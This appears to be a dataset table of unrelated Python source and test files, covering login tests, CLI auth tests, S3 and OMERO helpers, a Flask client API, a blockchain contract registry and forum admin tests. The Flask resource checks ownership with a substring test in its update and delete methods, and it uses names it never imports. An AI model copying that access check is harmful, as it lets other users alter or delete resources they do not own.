content
stringlengths 5
1.05M
|
|---|
import stat
from medperf.comms import Comms
import medperf.config as config
from medperf.commands import Login
from medperf.utils import storage_path
import pytest
from unittest.mock import mock_open
@pytest.fixture(params=["token123"])
def comms(mocker, request):
comms = mocker.create_autospec(spec=Comms)
mocker.patch.object(comms, "login")
mocker.patch("os.remove")
mocker.patch("os.chmod")
comms.token = request.param
return comms
def test_runs_comms_login(mocker, comms, ui):
# Arrange
spy = mocker.patch.object(comms, "login")
mocker.patch("builtins.open", mock_open())
# Act
Login.run(comms, ui)
# Assert
spy.assert_called_once()
def test_removes_previous_credentials(mocker, comms, ui):
# Arrange
creds_path = storage_path(config.credentials_path)
spy = mocker.patch("os.remove")
mocker.patch("builtins.open", mock_open())
mocker.patch("os.path.exists", return_value=True)
# Act
Login.run(comms, ui)
# Assert
spy.assert_called_once_with(creds_path)
@pytest.mark.parametrize(
"comms", ["test123", "wey0u392472340", "tokentoken"], indirect=True
)
def test_writes_new_credentials(mocker, comms, ui):
# Arrange
m = mock_open()
creds_path = storage_path(config.credentials_path)
spy = mocker.patch("builtins.open", m)
# Act
Login.run(comms, ui)
# Assert
spy.assert_called_once_with(creds_path, "w")
handle = m()
handle.write.assert_called_once_with(comms.token)
def test_sets_credentials_permissions_to_read(mocker, comms, ui):
# Arrange
creds_path = storage_path(config.credentials_path)
spy = mocker.patch("os.chmod")
mocker.patch("builtins.open", mock_open())
# Act
Login.run(comms, ui)
# Assert
spy.assert_called_once_with(creds_path, stat.S_IREAD)
|
from shutil import copy
import os
# To list all the files which have more than 100 lines
# find ALLIN -name "*.csv" -type f -exec sh -c 'test `wc -l {} | cut -f1 -d" "` -gt "100"' \; -print | tee abc
# get the current path
path = os.getcwd()
# prepare the destination path
dest = path + "/FILTERED/"
# open the file
files = open('abc')
# copy files one by one from source to destination
for src in files:
src = src.strip()
copy(src,dest)
#copyfile(src, dst)
|
""" Tests for seed_services_cli.identity_store """
from unittest import TestCase
from click.testing import CliRunner
from seed_services_cli.main import cli
import responses
import json
class TestSendCommand(TestCase):
def setUp(self):
self.runner = CliRunner()
def tearDown(self):
pass
def invoke_user_add(self, args, first_name="First", last_name="Last",
email="test@example.com", password="pass",
admin=False):
if admin:
args = args + ["--admin"]
return self.runner.invoke(cli, [
'auth-user-add',
'--first_name', first_name,
'--last_name', last_name,
'--email', email,
'--password', password,
] + args)
def invoke_user_change_password(self, args, email, password):
return self.runner.invoke(cli, [
'auth-user-change-password',
'--email', email,
'--password', password,
] + args)
def invoke_user_add_team(self, args, user=2, team=3):
return self.runner.invoke(cli, [
'auth-user-add-team',
'--user', user,
'--team', team,
] + args)
def test_user_add_help(self):
result = self.runner.invoke(cli, ['auth-user-add', '--help'])
self.assertEqual(result.exit_code, 0)
self.assertTrue(
"Create a user"
in result.output)
@responses.activate
def test_user_add_no_details(self):
# setup
login_response = {
"token": "3e6de6f2cace86d3ac22d0a58e652f4b283ab58c"
}
responses.add(responses.POST,
"http://auth.example.org/user/tokens/",
json=login_response, status=201)
result = self.runner.invoke(cli, ['auth-user-add'])
self.assertEqual(result.exit_code, 2)
self.assertTrue(
"Please specify all new user information. See --help."
in result.output)
@responses.activate
def test_user_add(self):
# setup
login_response = {
"token": "3e6de6f2cace86d3ac22d0a58e652f4b283ab58c"
}
responses.add(responses.POST,
"http://auth.example.org/user/tokens/",
json=login_response, status=201)
user_response = {
"id": "3",
"url": "http://auth.example.org/users/9/",
"first_name": "First",
"last_name": "Last",
"email": "test@example.com",
"admin": False,
"teams": [],
"organizations": [],
"active": False
}
responses.add(responses.POST,
"http://auth.example.org/users/",
json=user_response, status=200)
# Execute
result = self.invoke_user_add([])
# Check
self.assertEqual(result.exit_code, 0)
self.assertTrue("Creating account for test@example.com"
in result.output)
self.assertTrue("Created user. ID is 3." in result.output)
self.assertEqual(len(responses.calls), 2)
self.assertEqual(responses.calls[1].request.url,
"http://auth.example.org/users/")
@responses.activate
def test_user_add_admin(self):
# setup
login_response = {
"token": "3e6de6f2cace86d3ac22d0a58e652f4b283ab58c"
}
responses.add(responses.POST,
"http://auth.example.org/user/tokens/",
json=login_response, status=201)
user_response = {
"id": "3",
"url": "http://auth.example.org/users/9/",
"first_name": "First",
"last_name": "Last",
"email": "test@example.com",
"admin": False,
"teams": [],
"organizations": [],
"active": True
}
responses.add(responses.POST,
"http://auth.example.org/users/",
json=user_response, status=200)
# Execute
result = self.invoke_user_add([], admin=True)
# Check
self.assertEqual(result.exit_code, 0)
self.assertTrue("Creating account for test@example.com"
in result.output)
self.assertTrue("Created user. ID is 3." in result.output)
self.assertEqual(len(responses.calls), 2)
self.assertEqual(responses.calls[1].request.url,
"http://auth.example.org/users/")
@responses.activate
def test_user_change_password(self):
login_response = {
"token": "3e6de6f2cace86d3ac22d0a58e652f4b283ab58c"
}
responses.add(responses.POST,
"http://auth.example.org/user/tokens/",
json=login_response, status=201)
users_response = [{
'email': 'test@example.org',
}, {
'id': 2,
'email': 'test2@example.org'
}]
responses.add(responses.GET,
"http://auth.example.org/users/",
json=users_response, status=200)
responses.add(responses.PUT,
"http://auth.example.org/users/2/",
json={}, status=200)
result = self.invoke_user_change_password(
[], email='test2@example.org', password='testpass')
self.assertEqual(result.exit_code, 0)
self.assertTrue(
'Changing password for test2@example.org' in result.output)
self.assertEqual(len(responses.calls), 3)
self.assertEqual(
json.loads(responses.calls[2].request.body)['password'],
'testpass')
def test_user_add_team_help(self):
result = self.runner.invoke(cli, ['auth-user-add-team', '--help'])
self.assertEqual(result.exit_code, 0)
self.assertTrue(
"Add a user to a team"
in result.output)
@responses.activate
def test_user_add_user_team_no_details(self):
# setup
login_response = {
"token": "3e6de6f2cace86d3ac22d0a58e652f4b283ab58c"
}
responses.add(responses.POST,
"http://auth.example.org/user/tokens/",
json=login_response, status=201)
result = self.runner.invoke(cli, ['auth-user-add-team'])
self.assertEqual(result.exit_code, 2)
self.assertTrue(
"Please specify user and team. See --help."
in result.output)
|
"""Unit tests for the nag solver.
.. codeauthor:: Derek Huang <djh458@stern.nyu.edu>
"""
import numpy as np
import pytest
# pylint: disable=relative-beyond-top-level
from .._fast_gd import nag_solver
# mixtures of learning rate schedules and step sizes
_nag_learn_rates = [("backtrack", 1.), ("constant", 0.1)]
@pytest.mark.parametrize("learning_rate,eta0", _nag_learn_rates)
def test_nag_solver(convex_quad_min, learning_rate, eta0):
"""Test nag_solver on convex QP defined by convex_quad_min.
Parameters
----------
convex_quad_min : tuple
pytest fixture. See conftest.py.
learning_rate : str
Learning rate schedule to use, either "constant" or "backtrack".
eta0 : float
For learning_rate="constant", the learning rate to use, while for
learning_rate="backtrack", the learning rate upper search bound.
"""
# get objective, gradient, solution from convex_quad_min + dimensionality
fobj, fgrad, _, sol = convex_quad_min
n_dim = sol.size
# initial guess
x0 = np.zeros(n_dim)
# get FastGradResult using nag_solver
res = nag_solver(
fobj,
x0,
fgrad=fgrad,
learning_rate=learning_rate,
eta0=eta0,
tol=1e-8,
max_iter=2000
)
# check that res.loss is more or less the same as the optimal fobj value
np.testing.assert_allclose(res.loss, fobj(sol))
# check that res.res is close to the actual solution of convex_quad_min.
# need looser criteria on assert_allclose since optimization is hard
np.testing.assert_allclose(res.res, sol, rtol=1e-4)
|
import sys
from geo.calc import Calc, Distance
if sys.version_info[0] >= 3:
def test_add():
assert Calc().add(2, 3) == 5, 'Should be 5'
def test_mul():
assert Calc().multiply(2, 3) == 6, 'Should be 6'
def test_power():
assert Distance(2).power(2) == 4, 'Should be 4'
else:
import unittest
class TestCode(unittest.TestCase):
def test_add(self):
self.assertEqual(Calc().add(2, 3), 5, "Should be 5")
def test_mul(self):
self.assertEqual(Calc().multiply(2, 3), 6, "Should be 6")
def test_power(self):
self.assertEqual(Distance(2).power(2), 4, "Should be 4")
if __name__ == '__main__':
unittest.main()
|
import os
import json
from assisted_service_client import ApiClient, Configuration, api, models
class InventoryHost:
def __init__(self, host_dict):
self._host = models.Host(**host_dict)
self._inventory = models.Inventory(**json.loads(self._host.inventory))
def get_inventory_host_nics_data(self):
interfaces_list = [models.Interface(**interface) for interface in self._inventory.interfaces]
return [{'name': interface.name, 'model': interface.product, 'mac': interface.mac_address, 'ip': self._get_network_interface_ip(interface), 'speed': interface.speed_mbps} for interface in interfaces_list]
def get_inventory_host_cpu_data(self):
cpu = models.Cpu(**self._inventory.cpu)
return {'model': cpu.model_name, 'arch': cpu.architecture, 'flags': cpu.flags, 'clockMegahertz': cpu.frequency, 'count': cpu.count}
def get_inventory_host_storage_data(self):
disks_list = [models.Disk(**disk) for disk in self._inventory.disks]
return [{'name': disk.name, 'vendor': disk.vendor, 'sizeBytes': disk.size_bytes, 'model': disk.model, 'wwn': disk.wwn, 'hctl': disk.hctl, 'serialNumber': disk.serial, 'rotational': True if disk.drive_type == 'HDD' else False} for disk in disks_list]
def get_inventory_host_memory(self):
memory = models.Memory(**self._inventory.memory)
return int(memory.physical_bytes / 1024 / 1024)
def get_inventory_host_name(self):
return self._host.requested_hostname
def get_inventory_host_system_vendor(self):
system_vendor = models.SystemVendor(**self._inventory.system_vendor)
return {'manufacturer': system_vendor.manufacturer, 'productName': system_vendor.product_name, 'serialNumber': system_vendor.serial_number}
def is_role(self, role):
return self._host.role == role
def _get_network_interface_ip(self, interface):
if len(interface.ipv4_addresses) > 0:
return interface.ipv4_addresses[0].split("/")[0]
if len(interface.ipv6_addresses) > 0:
return interface.ipv6_addresses[0].split("/")[0]
return " "
def get_inventory_hosts(inventory_endpoint, cluster_id, token, skip_cert_verification=False, ca_cert_path=None):
configs = Configuration()
configs.host = inventory_endpoint
configs.api_key["X-Secret-Key"] = token
configs.verify_ssl = not skip_cert_verification
configs.ssl_ca_cert = ca_cert_path
apiClient = ApiClient(configuration=configs)
client = api.InstallerApi(api_client=apiClient)
hosts_list = client.list_hosts(cluster_id=cluster_id)
return [InventoryHost(host) for host in hosts_list if host['status'] != 'disabled']
|
from flask import request
from flask_jwt_extended import get_jwt_identity, jwt_required
from flask_restful import Resource
from ...models import Client, User
from ...schemas import ClientSchema
from .responses import respond
class ClientListResource(Resource):
@jwt_required
def get(self):
schema = ClientSchema(many=True, only=Fields.Client.compact)
user = User.objects.get(username=get_jwt_identity())
subscriptions = WebhookSubscription.objects.get(user=user)
clients = set(subscription.client for subscription in subscriptions)
return respond(200, {'clients': schema.dump(clients).data})
@jwt_required
def post(self):
schema = ClientSchema()
client = Client(**schema.load(request.args).data)
client.user = User.objects.get(username=get_jwt_identity())
try:
client.save()
except (NotUniqueError, ValidationError) as e:
return respond(400, {}, ['Validation error', str(e)])
return respond(201, {'client': schema.dump(client).data})
class ClientResource(Resource):
@jwt_required
def get(self, id):
try:
client = Client.objects.get(id=id)
except (DoesNotExist, ValidationError):
return respond(404, {}, ['Client does not exist'])
if get_jwt_identity() == client.user.username:
schema = ClientSchema()
else:
return respond(403, {}, ['Access forbidden'])
return respond(200, {'client': schema.dump(client).data})
@jwt_required
def put(self, id):
try:
client = Client.objects.get(id=id)
except (DoesNotExist, ValidationError):
return respond(404, {}, ['Client does not exist'])
if get_jwt_identity() in client.user.username:
schema = ClientSchema()
else:
return respond(403, {}, ['Access forbidden'])
try:
client.update(**schema.load(request.args).data)
# Return updated document
client = Client.objects.get(id=id)
except (NotUniqueError, ValidationError) as e:
return respond(400, {}, ['Validation error', str(e)])
return respond(200, {'client': schema.dump(client).data})
@jwt_required
def delete(self, id):
try:
client = Client.objects.get(id=id)
except (DoesNotExist, ValidationError):
return respond(404, {}, ['Client does not exist'])
if get_jwt_identity() not in client.user.username:
return respond(403, {}, ['Access forbidden'])
client.delete()
return respond(204)
|
# Copyright 2018 Amazon.com, Inc. or its affiliates. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"). You may not use this file except in compliance with
# the License. A copy of the License is located at
#
# http://aws.amazon.com/apache2.0/
#
# or in the "LICENSE.txt" file accompanying this file. This file is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES
# OR CONDITIONS OF ANY KIND, express or implied. See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import absolute_import, print_function
import json
import os
import zipfile
from io import BytesIO
import boto3
from botocore.exceptions import ClientError
def boto3_client(service, aws_client_config):
return boto3.client(
service,
region_name=aws_client_config["region_name"],
aws_access_key_id=aws_client_config["aws_access_key_id"],
aws_secret_access_key=aws_client_config["aws_secret_access_key"],
)
def boto3_resource(service, aws_client_config):
return boto3.resource(
service,
region_name=aws_client_config["region_name"],
aws_access_key_id=aws_client_config["aws_access_key_id"],
aws_secret_access_key=aws_client_config["aws_secret_access_key"],
)
def create_s3_bucket(bucket_name, aws_client_config):
"""
Create a new S3 bucket.
Args:
bucket_name: name of the S3 bucket to create
aws_client_config: dictionary containing configuration params for boto3 client
"""
s3_client = boto3_client("s3", aws_client_config)
""" :type : pyboto3.s3 """
try:
region = aws_client_config["region_name"]
if region != "us-east-1":
s3_client.create_bucket(Bucket=bucket_name, CreateBucketConfiguration={"LocationConstraint": region})
else:
s3_client.create_bucket(Bucket=bucket_name)
except s3_client.exceptions.BucketAlreadyOwnedByYou:
print("Bucket already exists")
def delete_s3_bucket(bucket_name, aws_client_config):
"""
Delete an S3 bucket together with all stored objects.
Args:
bucket_name: name of the S3 bucket to delete
aws_client_config: dictionary containing configuration params for boto3 client
"""
try:
bucket = boto3_resource("s3", aws_client_config).Bucket(bucket_name)
bucket.objects.all().delete()
bucket.delete()
except boto3.client("s3").exceptions.NoSuchBucket:
pass
except ClientError:
print("Failed to delete bucket %s. Please delete it manually." % bucket_name)
pass
def zip_dir(path):
"""
Create a zip archive containing all files and dirs rooted in path.
The archive is created in memory and a file handler is returned by the function.
Args:
path: directory containing the resources to archive.
Return:
file_out: file handler pointing to the compressed archive.
"""
file_out = BytesIO()
with zipfile.ZipFile(file_out, "w", zipfile.ZIP_DEFLATED) as ziph:
for root, _, files in os.walk(path):
for file in files:
ziph.write(os.path.join(root, file), os.path.relpath(os.path.join(root, file), start=path))
file_out.seek(0)
return file_out
def upload_resources_artifacts(bucket_name, root, aws_client_config):
"""
Upload to the specified S3 bucket the content of the directory rooted in root path.
All dirs contained in root dir will be uploaded as zip files to $bucket_name/$dir_name/artifacts.zip.
All files contained in root dir will be uploaded to $bucket_name.
Args:
bucket_name: name of the S3 bucket where files are uploaded
root: root directory containing the resources to upload.
aws_client_config: dictionary containing configuration params for boto3 client
"""
bucket = boto3_resource("s3", aws_client_config).Bucket(bucket_name)
for res in os.listdir(root):
if os.path.isdir(os.path.join(root, res)):
bucket.upload_fileobj(zip_dir(os.path.join(root, res)), "%s/artifacts.zip" % res)
elif os.path.isfile(os.path.join(root, res)):
bucket.upload_file(os.path.join(root, res), res)
def _get_json_from_s3(region, file_name):
"""
Get pricing file (if none) and parse content as json.
:param region: AWS Region
:param file_name the object name to get
:return: a json object representing the file content
:raises ClientError if unable to download the file
:raises ValueError if unable to decode the file content
"""
s3 = boto3.resource("s3", region_name=region)
bucket_name = "{0}-aws-parallelcluster".format(region)
file_contents = s3.Object(bucket_name, file_name).get()["Body"].read().decode("utf-8")
return json.loads(file_contents)
def get_supported_features(region, feature):
"""
Get a json object containing the attributes supported by a feature, for example.
{
"Features": {
"efa": {
"instances": ["c5n.18xlarge", "p3dn.24xlarge", "i3en.24xlarge"],
"baseos": ["alinux", "centos7"],
"schedulers": ["sge", "slurm", "torque"]
},
"awsbatch": {
"instances": ["r3.8xlarge", ..., "m5.4xlarge"]
}
}
}
:param region: AWS Region
:param feature: the feature to search for, i.e. "efa" "awsbatch"
:return: json object containing all the attributes supported by feature
"""
try:
features = _get_json_from_s3(region, "features/feature_whitelist.json")
supported_features = features.get("Features").get(feature)
except (ValueError, ClientError, KeyError):
print(
"Failed validate %s. This is probably a bug on our end. Please set sanity_check = false and retry" % feature
)
exit(1)
return supported_features
def get_instance_vcpus(region, instance_type):
"""
Get number of vcpus for the given instance type.
:param region: AWS Region
:param instance_type: the instance type to search for.
:return: the number of vcpus or -1 if the instance type cannot be found
or the pricing file cannot be retrieved/parsed
"""
try:
instances = _get_json_from_s3(region, "instances/instances.json")
vcpus = int(instances[instance_type]["vcpus"])
except (KeyError, ValueError, ClientError):
vcpus = -1
return vcpus
|
# Copyright (c) 2019, CRS4
#
# Permission is hereby granted, free of charge, to any person obtaining a copy of
# this software and associated documentation files (the "Software"), to deal in
# the Software without restriction, including without limitation the rights to
# use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of
# the Software, and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS
# FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR
# COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER
# IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
import omero
from omero.gateway import TagAnnotationWrapper
from .projects_datasets import _image_to_json
from .utils import switch_to_default_search_group
def _is_tagset(obj):
try:
obj.countTagsInTagset()
return True
except TypeError:
return False
def _tag_to_json(tag_object, images_list):
return {
'id': tag_object.getId(),
'type': 'tag',
'value': tag_object.getValue(),
'description': tag_object.getDescription(),
'images': images_list
}
def _tagset_to_json(tagset_object, tags_map=None):
if not tags_map:
tags_map = list()
return {
'id': tagset_object.getId(),
'type': 'tagset',
'value': tagset_object.getValue(),
'description': tagset_object.getDescription(),
'tags': tags_map
}
def _get_tags_list(connection, tagset_obj, fetch_images=False, append_raw_object=False):
tags = list()
for t in tagset_obj.listTagsInTagset():
images = list()
if fetch_images:
images = _get_images_by_tag(t.getId(), connection)
tag_json = _tag_to_json(t, images)
if append_raw_object:
tag_json['obj'] = t
tags.append(tag_json)
return tags
def _get_images_by_tag(tag_id, connection):
switch_to_default_search_group(connection)
imgs_generator = connection.getObjectsByAnnotations('Image', [tag_id])
images = list()
for img in imgs_generator:
images.append(_image_to_json(img, connection))
return images
def get_annotations_list(connection, fetch_images=False):
switch_to_default_search_group(connection)
tag_sets = list()
tags = list()
for t in connection.getObjects("TagAnnotation"):
if _is_tagset(t):
tag_sets.append(t)
else:
tags.append(t)
annotations = list()
for ts in tag_sets:
tags_map = _get_tags_list(connection, ts, fetch_images, append_raw_object=True)
for tmi in tags_map:
tobj = tmi.pop('obj')
try:
tags.pop(tags.index(tobj))
except ValueError:
pass
tagset_json = _tagset_to_json(ts, tags_map)
annotations.append(tagset_json)
for t in tags:
imgs_list = list()
if fetch_images:
imgs_list = _get_images_by_tag(t.getId(), connection)
annotations.append(_tag_to_json(t, imgs_list))
return annotations
def get_tagset(connection, tagset_id, fetch_tags=False, fetch_images=False):
switch_to_default_search_group(connection)
tagset = connection.getObject('TagAnnotation', tagset_id)
if tagset is not None and _is_tagset(tagset):
tags_map = list()
if fetch_tags:
tags_map = _get_tags_list(connection, tagset, fetch_images)
return _tagset_to_json(tagset, tags_map)
else:
return None
def get_tag(connection, tag_id, fetch_images=False):
switch_to_default_search_group(connection)
tag = connection.getObject('TagAnnotation', tag_id)
if tag is not None and not _is_tagset(tag):
images = list()
if fetch_images:
images = _get_images_by_tag(tag_id, connection)
return _tag_to_json(tag, images)
else:
return None
def find_annotations(search_pattern, connection, fetch_images=False):
switch_to_default_search_group(connection)
query_service = connection.getQueryService()
query_params = omero.sys.ParametersI()
query_params.addString('search_pattern', '%%%s%%' % search_pattern)
query = '''
SELECT t FROM TagAnnotation t
WHERE lower(t.description) LIKE lower(:search_pattern)
OR lower(t.textValue) LIKE lower(:search_pattern)
'''
annotations = list()
for res in query_service.findAllByQuery(query, query_params):
res = TagAnnotationWrapper(connection, res)
if _is_tagset(res):
annotations.append(_tagset_to_json(res))
else:
imgs_list = list()
if fetch_images:
imgs_list = _get_images_by_tag(res.getId(), connection)
annotations.append(_tag_to_json(res, imgs_list))
return annotations
|
from onegov.fsi.models.course_event import (
COURSE_EVENT_STATUSES_TRANSLATIONS, COURSE_EVENT_STATUSES
)
from onegov.fsi.models.course_notification_template import \
NOTIFICATION_TYPE_TRANSLATIONS, NOTIFICATION_TYPES
from onegov.org.layout import DefaultLayout as BaseLayout
from onegov.fsi import _
class FormatMixin:
@staticmethod
def format_status(model_status):
return COURSE_EVENT_STATUSES_TRANSLATIONS[
COURSE_EVENT_STATUSES.index(model_status)
]
@staticmethod
def format_notification_type(notification_type):
return NOTIFICATION_TYPE_TRANSLATIONS[
NOTIFICATION_TYPES.index(notification_type)
]
def format_boolean(self, val):
assert isinstance(val, bool)
return self.request.translate((_('Yes') if val else _('No')))
class DefaultLayout(BaseLayout, FormatMixin):
def include_accordion(self):
self.request.include('accordion')
def instance_link(self, instance):
return self.request.link(instance)
|
from .abc import (
BaseAuth,
BaseAuthSession,
BaseSync,
InvalidAuthSession,
ServiceImplementation,
)
from .exc import (
ServiceAPIError,
ServiceAuthError,
ServiceError,
ServiceRateLimitError,
ServiceTokenExpiredError,
ServiceUnavailableError,
UserCancelledError,
)
from .retries import retry_ratelimited, retry_unavailable
__all__ = (
"BaseAuth",
"BaseAuthSession",
"BaseSync",
"InvalidAuthSession",
"ServiceAPIError",
"ServiceAuthError",
"ServiceError",
"ServiceImplementation",
"ServiceRateLimitError",
"ServiceTokenExpiredError",
"ServiceUnavailableError",
"UserCancelledError",
"retry_ratelimited",
"retry_unavailable",
)
|
"""
time: 17 min
errors:
off by one with slice s[mj:mi]
forgot to move failure pointer
"""
class Solution:
def minWindow(self, s: str, t: str) -> str:
j = 0
matched = 0
ht = {}
minRes = float('inf')
mi = mj = 0
for c in t:
ht[c] = ht.get(c, 0) + 1
for i, c in enumerate(s):
if c in ht:
ht[c] -= 1
if ht[c] == 0:
matched += 1
if matched == len(ht):
if i - j + 1 < minRes:
minRes = i - j + 1
mi = i + 1
mj = j
while matched == len(ht):
jc = s[j]
if matched == len(ht):
if i - j + 1 < minRes:
minRes = i - j + 1
mi = i+1
mj = j
if jc in ht:
if ht[jc] == 0:
matched -= 1
ht[jc] += 1
j += 1
if mi == 0 and mj == 0:
return ''
return s[mj:mi]
|
import json
from typing import List
from pkg_resources import resource_filename
class Registry:
"""
It will get every contract address from the registry contract and return this address with the contract ABI.
Attributes
web3: web3.Web3
web3 object
"""
def __init__(self, web3: "Web3 object"):
self.web3 = web3
def load_all_contracts(self) -> List[dict]:
"""
Return addresses and ABIs of all the known contracts
"""
try:
with open(resource_filename('celo_sdk', 'registry_contracts.json')) as json_file:
contracts_data = json.load(json_file)
result = []
for k, v in contracts_data.items():
if k != "Registry":
contract_address = self.registry.functions.getAddressForString(
k).call()
result.append(
{"contract_name": k, "address": contract_address, "abi": v["ABI"]})
return result
except KeyError:
raise KeyError(
"Key not found in registry_contracts.json config file")
except FileNotFoundError:
raise FileNotFoundError(
"File with contracts ABIs registry_contracts.json not found")
def load_contract_by_name(self, contract_name: str, contract_address: str = None) -> dict:
"""
Get contract address from Registry contract by name
Parameters:
contract_name: str
Returns:
dictionary with contract address and ABI
"""
try:
account_contract_address = self.registry.functions.getAddressForString(
contract_name).call() if contract_address == None else contract_address
with open(resource_filename('celo_sdk', 'registry_contracts.json')) as json_file:
contracts_data = json.load(json_file)
return {"address": account_contract_address, "abi": contracts_data[contract_name]["ABI"]}
except KeyError:
raise KeyError(
"Key not found in registry_contracts.json config file")
except FileNotFoundError:
raise FileNotFoundError(
"File with contracts ABIs registry_contracts.json not found")
def set_registry(self):
"""
Set Registry contract object
"""
try:
with open(resource_filename('celo_sdk', 'registry_contracts.json')) as json_file:
contracts_data = json.load(json_file)
registry = self.web3.eth.contract(
contracts_data["Registry"]["Address"], abi=contracts_data["Registry"]["ABI"])
self.registry = registry
except KeyError:
raise KeyError(
"Key not found in registry_contracts.json config file")
except FileNotFoundError:
raise FileNotFoundError(
"File with contracts ABIs registry_contracts.json not found")
|
from django.urls import reverse
from ....acl import ACL_CACHE
from ....admin.test import AdminTestCase
from ....cache.test import assert_invalidates_cache
from ....threads import test
from ....threads.models import Thread
from ...models import Category
class CategoryAdminTestCase(AdminTestCase):
def assertValidTree(self, expected_tree):
root = Category.objects.root_category()
queryset = Category.objects.filter(tree_id=root.tree_id).order_by("lft")
current_tree = []
for category in queryset:
current_tree.append(
(
category,
category.level,
category.lft - root.lft + 1,
category.rght - root.lft + 1,
)
)
if len(expected_tree) != len(current_tree):
self.fail(
"nodes tree is %s items long, should be %s"
% (len(current_tree), len(expected_tree))
)
for i, category in enumerate(expected_tree):
_category = current_tree[i]
if category[0] != _category[0]:
self.fail(
("expected category at index #%s to be %s, " "found %s instead")
% (i, category[0], _category[0])
)
if category[1] != _category[1]:
self.fail(
("expected level at index #%s to be %s, " "found %s instead")
% (i, category[1], _category[1])
)
if category[2] != _category[2]:
self.fail(
("expected lft at index #%s to be %s, " "found %s instead")
% (i, category[2], _category[2])
)
if category[3] != _category[3]:
self.fail(
("expected lft at index #%s to be %s, " "found %s instead")
% (i, category[3], _category[3])
)
class CategoryAdminViewsTests(CategoryAdminTestCase):
def test_link_registered(self):
"""admin nav contains categories link"""
response = self.client.get(reverse("misago:admin:categories:index"))
self.assertContains(response, reverse("misago:admin:categories:index"))
def test_list_view(self):
"""categories list view returns 200"""
response = self.client.get(reverse("misago:admin:categories:index"))
self.assertContains(response, "First category")
# Now test that empty categories list contains message
root = Category.objects.root_category()
for descendant in root.get_descendants():
descendant.delete()
response = self.client.get(reverse("misago:admin:categories:index"))
self.assertEqual(response.status_code, 200)
self.assertContains(response, "No categories")
def test_new_view(self):
"""new category view has no showstoppers"""
root = Category.objects.root_category()
first_category = Category.objects.get(slug="first-category")
response = self.client.get(reverse("misago:admin:categories:new"))
self.assertEqual(response.status_code, 200)
response = self.client.post(
reverse("misago:admin:categories:new"),
data={
"name": "Test Category",
"description": "Lorem ipsum dolor met",
"new_parent": root.pk,
"prune_started_after": 0,
"prune_replied_after": 0,
},
)
self.assertEqual(response.status_code, 302)
response = self.client.get(reverse("misago:admin:categories:index"))
self.assertContains(response, "Test Category")
test_category = Category.objects.get(slug="test-category")
self.assertValidTree(
[(root, 0, 1, 6), (first_category, 1, 2, 3), (test_category, 1, 4, 5)]
)
response = self.client.post(
reverse("misago:admin:categories:new"),
data={
"name": "Test Other Category",
"description": "Lorem ipsum dolor met",
"new_parent": root.pk,
"prune_started_after": 0,
"prune_replied_after": 0,
},
)
self.assertEqual(response.status_code, 302)
test_other_category = Category.objects.get(slug="test-other-category")
self.assertValidTree(
[
(root, 0, 1, 8),
(first_category, 1, 2, 3),
(test_category, 1, 4, 5),
(test_other_category, 1, 6, 7),
]
)
response = self.client.post(
reverse("misago:admin:categories:new"),
data={
"name": "Test Subcategory",
"new_parent": test_category.pk,
"copy_permissions": test_category.pk,
"prune_started_after": 0,
"prune_replied_after": 0,
},
)
self.assertEqual(response.status_code, 302)
test_subcategory = Category.objects.get(slug="test-subcategory")
self.assertValidTree(
[
(root, 0, 1, 10),
(first_category, 1, 2, 3),
(test_category, 1, 4, 7),
(test_subcategory, 2, 5, 6),
(test_other_category, 1, 8, 9),
]
)
response = self.client.get(reverse("misago:admin:categories:index"))
self.assertContains(response, "Test Subcategory")
def test_creating_new_category_invalidates_acl_cache(self):
root = Category.objects.root_category()
with assert_invalidates_cache(ACL_CACHE):
self.client.post(
reverse("misago:admin:categories:new"),
data={
"name": "Test Category",
"description": "Lorem ipsum dolor met",
"new_parent": root.pk,
"prune_started_after": 0,
"prune_replied_after": 0,
},
)
def test_edit_view(self):
"""edit category view has no showstoppers"""
private_threads = Category.objects.private_threads()
root = Category.objects.root_category()
first_category = Category.objects.get(slug="first-category")
response = self.client.get(
reverse("misago:admin:categories:edit", kwargs={"pk": private_threads.pk})
)
self.assertEqual(response.status_code, 302)
response = self.client.get(
reverse("misago:admin:categories:edit", kwargs={"pk": root.pk})
)
self.assertEqual(response.status_code, 302)
response = self.client.post(
reverse("misago:admin:categories:new"),
data={
"name": "Test Category",
"description": "Lorem ipsum dolor met",
"new_parent": root.pk,
"prune_started_after": 0,
"prune_replied_after": 0,
},
)
self.assertEqual(response.status_code, 302)
test_category = Category.objects.get(slug="test-category")
response = self.client.get(
reverse("misago:admin:categories:edit", kwargs={"pk": test_category.pk})
)
self.assertContains(response, "Test Category")
response = self.client.post(
reverse("misago:admin:categories:edit", kwargs={"pk": test_category.pk}),
data={
"name": "Test Category Edited",
"new_parent": root.pk,
"role": "category",
"prune_started_after": 0,
"prune_replied_after": 0,
},
)
self.assertEqual(response.status_code, 302)
self.assertValidTree(
[(root, 0, 1, 6), (first_category, 1, 2, 3), (test_category, 1, 4, 5)]
)
response = self.client.get(reverse("misago:admin:categories:index"))
self.assertContains(response, "Test Category Edited")
response = self.client.post(
reverse("misago:admin:categories:edit", kwargs={"pk": test_category.pk}),
data={
"name": "Test Category Edited",
"new_parent": first_category.pk,
"role": "category",
"prune_started_after": 0,
"prune_replied_after": 0,
},
)
self.assertEqual(response.status_code, 302)
self.assertValidTree(
[(root, 0, 1, 6), (first_category, 1, 2, 5), (test_category, 2, 3, 4)]
)
response = self.client.get(reverse("misago:admin:categories:index"))
self.assertContains(response, "Test Category Edited")
def test_editing_category_invalidates_acl_cache(self):
root = Category.objects.root_category()
self.client.post(
reverse("misago:admin:categories:new"),
data={
"name": "Test Category",
"description": "Lorem ipsum dolor met",
"new_parent": root.pk,
"prune_started_after": 0,
"prune_replied_after": 0,
},
)
